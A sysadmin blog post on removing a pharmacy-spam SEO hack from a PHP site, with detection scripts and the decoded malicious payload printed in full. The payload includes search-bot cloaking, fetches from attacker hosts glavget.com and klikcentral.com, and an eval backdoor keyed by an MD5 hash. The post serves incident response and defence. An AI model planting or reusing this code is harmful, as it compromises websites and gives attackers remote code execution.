Site Hacked with Pharmacy Spammy Content on search listings

Got an email* today that adminschoice.com searches on google.com were resulting in pharmacy spam URLs and content. It took around three hours to find out what was happening and fix it. The site should be free of spam now. It may take a while for the Google index entries to update, but the redirect is no longer happening.

For the benefit of sysadmins who may face this issue, here are some details on how to take care of it.

Anatomy of a site hacked with pharmacy spam content in search listings

How it works, and how the Google listings get modified

Malicious code is inserted into one of your files, such as the theme's functions.php.
This code makes requests for your pages be served from another server.
When Googlebot, MSN or another bot indexes the site, your own content is hidden by the redirect and the pharmacy spam content is what the bot retrieves. That result is stored in the Google index, and you see the spam entries in the Google search results.
(You can check what the Google, MSN and Yahoo bots receive from your web page at http://redleg-redleg.com/file-viewer/)

When you click the link in the search engine results, the request is redirected to the other site from within your site, so the link stays the same while the content and its description change.
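Both behaviours described above leave traces in the web server's access log: crawlers receive a different response from the same URL than browsers do, and visitors arriving from a search engine get redirected while direct visitors do not. The following is an added example (editor's code, not from the original post) that runs those two checks over a constructed set of combined-format log lines; the thresholds and the bot/search-engine patterns are assumptions to tune for a real site.

```python
"""Two access-log checks for cloaking: (1) crawler UAs receiving a very different
response size than browsers for the same path, and (2) search-referred visitors
being redirected while direct visitors are served normally.
Added example; the log lines are constructed, not taken from a real server."""
import re
import statistics
from collections import defaultdict

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
BOT_UA_RE = re.compile(r"bot|slurp|crawler|spider", re.IGNORECASE)
# The same engines the kit's own referer check looks for, plus bing (assumed list).
SEARCH_REF_RE = re.compile(r"google|yahoo|bing|msn|live|ask|aol", re.IGNORECASE)

GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
FIREFOX = "Mozilla/5.0 (Windows NT 6.1) Firefox/9.0"

# Constructed sample: /about/ is cloaked and redirects search traffic; /contact/ behaves normally.
SAMPLE_LOG = [
    f'66.249.66.1 - - [10/Jan/2012:10:00:01 +0000] "GET /about/ HTTP/1.1" 200 18422 "-" "{GOOGLEBOT}"',
    f'66.249.66.2 - - [10/Jan/2012:10:05:11 +0000] "GET /about/ HTTP/1.1" 200 18390 "-" "{GOOGLEBOT}"',
    f'198.51.100.7 - - [10/Jan/2012:10:07:40 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "{FIREFOX}"',
    f'198.51.100.8 - - [10/Jan/2012:10:09:02 +0000] "GET /about/ HTTP/1.1" 200 5118 "-" "{FIREFOX}"',
    f'203.0.113.5 - - [10/Jan/2012:10:12:13 +0000] "GET /about/ HTTP/1.1" 302 0 "http://www.google.com/search?q=adminschoice" "{FIREFOX}"',
    f'203.0.113.9 - - [10/Jan/2012:10:14:55 +0000] "GET /about/ HTTP/1.1" 302 0 "http://search.yahoo.com/search?p=adminschoice" "{FIREFOX}"',
    f'66.249.66.3 - - [10/Jan/2012:10:20:00 +0000] "GET /contact/ HTTP/1.1" 200 4100 "-" "{GOOGLEBOT}"',
    f'66.249.66.4 - - [10/Jan/2012:10:21:30 +0000] "GET /contact/ HTTP/1.1" 200 4096 "-" "{GOOGLEBOT}"',
    f'198.51.100.7 - - [10/Jan/2012:10:22:10 +0000] "GET /contact/ HTTP/1.1" 200 4102 "-" "{FIREFOX}"',
    f'198.51.100.9 - - [10/Jan/2012:10:25:41 +0000] "GET /contact/ HTTP/1.1" 200 4100 "-" "{FIREFOX}"',
    f'203.0.113.6 - - [10/Jan/2012:10:27:03 +0000] "GET /contact/ HTTP/1.1" 200 4101 "http://www.google.com/search?q=contact" "{FIREFOX}"',
]


def parse(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def bot_size_gap(lines, min_ratio=3.0, min_samples=2):
    """Per path, median bytes of 200 responses served to crawler UAs vs. other UAs.
    Returns {path: (bot_median, user_median, ratio)} for paths where the gap reaches min_ratio."""
    sizes = defaultdict(lambda: {"bot": [], "user": []})
    for line in lines:
        rec = parse(line)
        if not rec or rec["status"] != "200" or rec["bytes"] == "-":
            continue
        kind = "bot" if BOT_UA_RE.search(rec["ua"]) else "user"
        sizes[rec["path"]][kind].append(int(rec["bytes"]))
    flagged = {}
    for path, s in sizes.items():
        if len(s["bot"]) < min_samples or len(s["user"]) < min_samples:
            continue
        bot_med, user_med = statistics.median(s["bot"]), statistics.median(s["user"])
        ratio = max(bot_med, user_med) / max(1, min(bot_med, user_med))
        if ratio >= min_ratio:
            flagged[path] = (bot_med, user_med, round(ratio, 1))
    return flagged


def search_referral_redirects(lines, min_fraction=0.5):
    """Per path, how often non-bot visitors referred by a search engine got a 3xx, compared
    with direct visitors. Flags paths where search-referred traffic is redirected at least
    min_fraction of the time while direct traffic is not."""
    counts = defaultdict(lambda: {"search": [0, 0], "direct": [0, 0]})  # [requests, redirected]
    for line in lines:
        rec = parse(line)
        if not rec or BOT_UA_RE.search(rec["ua"]):
            continue
        kind = "search" if SEARCH_REF_RE.search(rec["referer"]) else "direct"
        c = counts[rec["path"]][kind]
        c[0] += 1
        if rec["status"].startswith("3"):
            c[1] += 1
    flagged = {}
    for path, c in counts.items():
        s_total, s_redir = c["search"]
        d_total, d_redir = c["direct"]
        if s_total and s_redir / s_total >= min_fraction and (d_total == 0 or d_redir / d_total < min_fraction):
            flagged[path] = {"search_referred": s_total, "search_redirected": s_redir,
                             "direct": d_total, "direct_redirected": d_redir}
    return flagged


if __name__ == "__main__":
    print("size gap between crawlers and browsers:", bot_size_gap(SAMPLE_LOG))
    print("search-referred visitors redirected:", search_referral_redirects(SAMPLE_LOG))
```

On the sample, only /about/ is reported by both checks: crawlers get an 18 KB page where browsers get 5 KB, and every visitor arriving from Google or Yahoo receives a 302 while direct visitors get a 200. The size check alone also fires on legitimate differences (mobile variants, A/B tests), so treat a hit as a prompt to fetch the page with a crawler User-Agent and compare, not as proof on its own.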

Here are the details of how to find and remove the malicious code from your site:

  • 1. The hacked code is generally inserted into a PHP or other file as a base64-encoded string similar to the one below (the string continues for a few more lines; about 8k characters in this example):

    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90X2xpc3QgPSBhcnJheSgiOC42LjQ4IiwiNjIuMTcyLjE5OSIsIjYyLjI3LjU5IiwiNjMuMTYzLjEwMiIsIjY0LjE1Ny4xMzciLCI2NC4xNTcuMTM4IiwiNjQuMjMzLjE3MyIsIjY0LjY4LjgwIiwiNjQuNjguODEiLCI2NC42OC44M...
  • 2. Use find and grep to locate eval and base64_decode inside the files. Many files use them for legitimate purposes, but the hacked file carries a long encoded string to hide the program. Use the following commands:

    find . -type f -exec grep -iH eval {} \; | grep base64    # look for long strings of numbers and letters

    find . -type f -exec grep -il 'eval(base64_decode' {} \;    # gives the names of the files

  • 3. From the output of the above commands, pinpoint the hacked file. Do a `more` on the file to confirm you have the correct one. Rename the file so that it is no longer used by any program.
  • 4. If you have a copy of the original file, copy it back into place; otherwise run grep -v base64 hacked-file.php > good-file.php to strip the encoded line, and rename the result to the original file name.
  • 5. If interested, you can copy and paste the string into http://www.functions-online.com/base64_decode.html to see what the program was trying to do.
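Steps 1 to 5 above can be scripted so that the search, the decoding and the cleanup happen in one pass, with the decoding done locally rather than by pasting the string into a third-party site. The following is an added example (editor's code, not from the original post): it walks a web root for eval(base64_decode('...')) statements whose payload is long enough to be suspicious, decodes each one, reports which of the kit's distinctive strings appear in it, and writes a cleaned copy of the infected file. The web root, the sample infected functions.php and the indicator list are constructed for the demo.

```python
"""Find, decode and remove long eval(base64_decode('...')) payloads.
Added example; the files it scans are constructed below, not real malware."""
import base64
import os
import re
import tempfile

# eval(base64_decode('PAYLOAD')) -- the construct the post's find/grep hunts for.
PAYLOAD_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# The whole statement, including the trailing semicolon, for removal.
STATEMENT_RE = re.compile(PAYLOAD_RE.pattern + r"\s*;?", re.IGNORECASE)
# Legitimate uses are short; the post's sample ran to ~7-8k characters. Threshold is an assumption.
MIN_PAYLOAD = 200
# Strings that mark the cloaking kit shown in the post once decoded (assumed indicator list).
INDICATORS = ("$bot_list", "HTTP_USER_AGENT", "HTTP_REFERER", "$_POST", "eval(", "curl_init", "header(")


def decode_payload(b64: str) -> str:
    """Decode base64 locally; tolerates whitespace and stripped '=' padding."""
    b64 = re.sub(r"\s+", "", b64)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def scan_file(path):
    """Return [(payload_length, decoded_text, matched_indicators)] for each long payload in a file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = []
    for m in PAYLOAD_RE.finditer(text):
        if len(m.group(1)) < MIN_PAYLOAD:
            continue  # a short, ordinary base64_decode() use, as step 2 warns about
        decoded = decode_payload(m.group(1))
        hits.append((len(m.group(1)), decoded, [i for i in INDICATORS if i in decoded]))
    return hits


def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Walk the tree like `find . -exec grep ...` and map each infected path to its hits."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                hits = scan_file(path)
                if hits:
                    results[path] = hits
    return results


def clean_file(path):
    """Write <path>.clean with only the long eval(base64_decode()) statements removed.
    Unlike `grep -v base64`, lines that mention base64 for legitimate reasons survive."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    cleaned = STATEMENT_RE.sub(lambda m: "" if len(m.group(1)) >= MIN_PAYLOAD else m.group(0), text)
    with open(path + ".clean", "w", encoding="utf-8") as fh:
        fh.write(cleaned)
    return cleaned


def build_demo_root(root):
    """Constructed web root: a clean config.php and a theme functions.php carrying a stand-in
    payload. The stand-in only repeats the kit's distinctive strings; it is not the malware."""
    stand_in = (
        '$bot_list = array("66.249.64", "66.249.65");\n'
        'if (in_array($ip, $bot_list) || strpos($_SERVER["HTTP_USER_AGENT"], "bot")) { echo $printpage; die; }\n'
        'if (preg_match("/google|yahoo/", $_SERVER["HTTP_REFERER"])) { header("location: " . $url); die; }\n'
    ) * 3
    b64 = base64.b64encode(stand_in.encode()).decode()
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme, exist_ok=True)
    with open(os.path.join(theme, "functions.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\neval(base64_decode('" + b64 + "'));\nfunction theme_setup() { return true; }\n")
    with open(os.path.join(root, "config.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n$cfg = base64_decode('aGVsbG8=');  // short, legitimate\n")


def run_demo():
    """Build the constructed root, scan it, clean the hit and return a summary."""
    root = tempfile.mkdtemp(prefix="pharma-scan-")
    build_demo_root(root)
    found = scan_tree(root)
    summary = {"infected": [os.path.relpath(p, root) for p in sorted(found)],
               "indicators": [], "payload_length": 0, "cleaned_ok": False}
    for path in sorted(found):
        length, decoded, indicators = found[path][0]
        summary["payload_length"], summary["indicators"] = length, indicators
        cleaned = clean_file(path)
        summary["cleaned_ok"] = "base64_decode" not in cleaned and "theme_setup" in cleaned
    return summary


if __name__ == "__main__":
    print(run_demo())
```

The cleaned copy is written beside the original rather than over it, so the infected file can be kept (renamed, as step 3 says) for comparison with the CMS's or theme's pristine copy; restoring a known-good file is still the safer fix, since a kit may have touched more than the one statement the regex sees. Decoding locally also keeps the payload, which may contain the attacker's backdoor key and callback URLs, off a third-party website.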

For the curious who want to know what is happening, here is the code after base64 decoding (via http://www.functions-online.com/base64_decode.html). It was added to one of the .php files as a base64-encoded string of ~7k characters, causing the Google results to show the spam link descriptions.

---- code ----
// Decoded payload (it runs inside eval(), so there is no <?php tag). The comments were added by the editor.

// /24 prefixes (first three octets) of crawler addresses: Google, Yahoo/Inktomi, MSN and others.
$bot_list = array(
    "8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82",
    "64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92",
    "64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77",
    "66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65",
    "66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67",
    "66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232",
    "66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52",
    "67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231",
    "68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199",
    "72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129",
    "72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213",
    "72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61",
    "72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11",
    "74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22",
    "74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31",
    "74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73",
    "74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","141.185.209",
    "169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98",
    "202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13",
    "209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62",
    "209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83",
    "209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58",
    "216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45",
    "216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130","174.36.55","94.100.17"
);
// Drop the last octet of the visitor's address so it can be matched against the /24 list above.
$ip = preg_replace("/\.(\d+)$/", '', $_SERVER["REMOTE_ADDR"]);
$originalip = $_SERVER["REMOTE_ADDR"];

// Fetches replacement content from the attacker's server: the spam page for crawlers, the keyword
// lookup ("seo") for search-referred visitors, or the body of an arbitrary URL ("traffic").
// Tries curl, then file_get_contents(), then a raw HTTP/1.0 request over a socket.
// (The default for $typeread was added so that the two-argument call further down is valid.)
function read_content($getsite, $getpage, $typeread = "") {
    $out = "";
    // The post shows this URL already decoded; in the payload it is wrapped in base64_decode().
    $sourceurl = 'http://glavget.com/get/?site=' . urlencode($getsite) . '&page=' . urlencode($getpage)
               . '&ip=' . urlencode($_SERVER['REMOTE_ADDR']) . '&agent=' . urlencode($_SERVER['HTTP_USER_AGENT']);
    if ($typeread == "seo") {
        $sourceurl = $sourceurl . "&seo=yes";
    }
    if ($typeread == "traffic") {
        $sourceurl = $getsite;
    }
    if (function_exists("curl_init")) {
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $sourceurl);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($c, CURLOPT_TIMEOUT, 10);
        $out = curl_exec($c);
        curl_close($c);
    }
    if ($out == "") {
        $out = @file_get_contents($sourceurl);
    }
    if ($out == "") {
        if (!preg_match('/^http(s){0,1}:\/\/(.*?)\//', $sourceurl, $matches)) {
            $out = "";
        }
        $domain = $matches[2];
        $fp = fsockopen($domain, 80, $errno, $errstr, 30);
        if (!$fp) { $out = ''; } else {
            $crlf = "\r\n";
            $req = "GET $sourceurl HTTP/1.0" . $crlf;
            $req .= 'Host: ' . $domain . $crlf;
            $req .= 'User-Agent: Mozilla/5.0 Firefox/3.6.12' . $crlf . $crlf;
            fwrite($fp, $req);
            $out = '';
            while (!feof($fp)) {
                $out .= fgets($fp, 256);
            }
            // Strip the response headers and keep the body.
            $out = substr($out, strpos($out, "\r\n\r\n") + 4);
        }
    }
    if ($out == "") {
        $out = "0";
    }
    return $out;
}

if (!array_key_exists('HTTP_USER_AGENT', $_SERVER))
    $_SERVER['HTTP_USER_AGENT'] = '';

// Backdoor: a POST whose "key" field hashes to this value gets its "code" field run as PHP.
if (md5($_POST["key"]) == "c8d4613f940c517da44c91e7223140f3") { $cmd = $_POST["code"]; eval(stripslashes($cmd)); exit; }

// Cloaking: a visitor from a listed crawler network, or with "bot" in its User-Agent, is served the
// spam page fetched from the attacker's server instead of the site's own page.
if (in_array($ip, $bot_list) || strpos($_SERVER['HTTP_USER_AGENT'], "bot")) {
    $printpage = read_content($_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI']);
    if (substr($printpage, 0, 3) == "OK!") {
        $printpage = substr($printpage, 3);
    } else {
        $printpage = "0";
    }
    if ($printpage != "0") {
        echo $printpage; die;
    }
}

// Redirect: a human visitor arriving from a search engine is sent to the spam site (the base64 string
// below decodes to http://klikcentral.com/traffic/in.cgi?10&parameter=), so the search listing shows
// your URL but lands elsewhere.
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"]) && !preg_match("/^(000000000000)/", $originalip)) {
    $seopage = read_content($_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI'], 'seo');
    $trafficpage = "0";
    if (substr($seopage, 0, 4) == "SEO!") {
        $getkeyword = substr($seopage, 4);
        $urlsutra = base64_decode('aHR0cDovL2tsaWtjZW50cmFsLmNvbS90cmFmZmljL2luLmNnaT8xMCZwYXJhbWV0ZXI9');
        $urlsutra = $urlsutra . urlencode($getkeyword) . "&seoref=" . $_SERVER["HTTP_REFERER"] . "&HTTP_REFERER=" . $_SERVER['HTTP_HOST'];
        header('Cache-Control: no-cache, no-store, must-revalidate');
        $trafficpage = read_content($urlsutra, '', 'traffic');
        if ($trafficpage != "0") {
            echo $trafficpage; die;
        } else {
            header("location: " . $urlsutra); die;
        }
    }
}
---- end code ----

* Thanks Andy for pointing out this issue.

One Response to Site Hacked with Pharmacy Spammy Content on search listings

  1. Amine says:

    It happened to a website I used to manage. They inject code that you don't see when you browse the website. However, search engines see different content. I think they call it "black SEO".

    If you have access to the server config files, you can try to disable PHP functions you don't need. Many scripts used by ill-intentioned parties rely heavily on functions like system, passthru, etc., while most websites don't need them. If you block these, even if they manage to upload a script to the server and call it from a browser, it's not going to work.
